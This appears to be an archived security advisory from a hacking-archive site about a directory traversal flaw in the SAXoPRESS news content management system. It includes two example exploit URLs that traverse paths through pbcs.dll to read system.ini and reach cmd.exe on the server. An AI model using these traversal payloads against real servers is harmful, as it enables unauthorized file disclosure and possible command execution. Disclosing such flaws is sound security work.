AOH :: HP Unsorted S :: B06-1558.HTM

Saxopress - directory traversal



SAXoPRESS - directory traversal
SAXoPRESS - directory traversal



SAXoPRESS is a content management system, mainly used for news publishing.

A vulnerability exists in SAXoPRESS, which allows malicious users to read the contents of files on the server, and possibly execute arbitrary commands.

Example exploit:
http://example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system.ini 
http://example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system32/cmd.exe 

Affected versions: unconfirmed

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.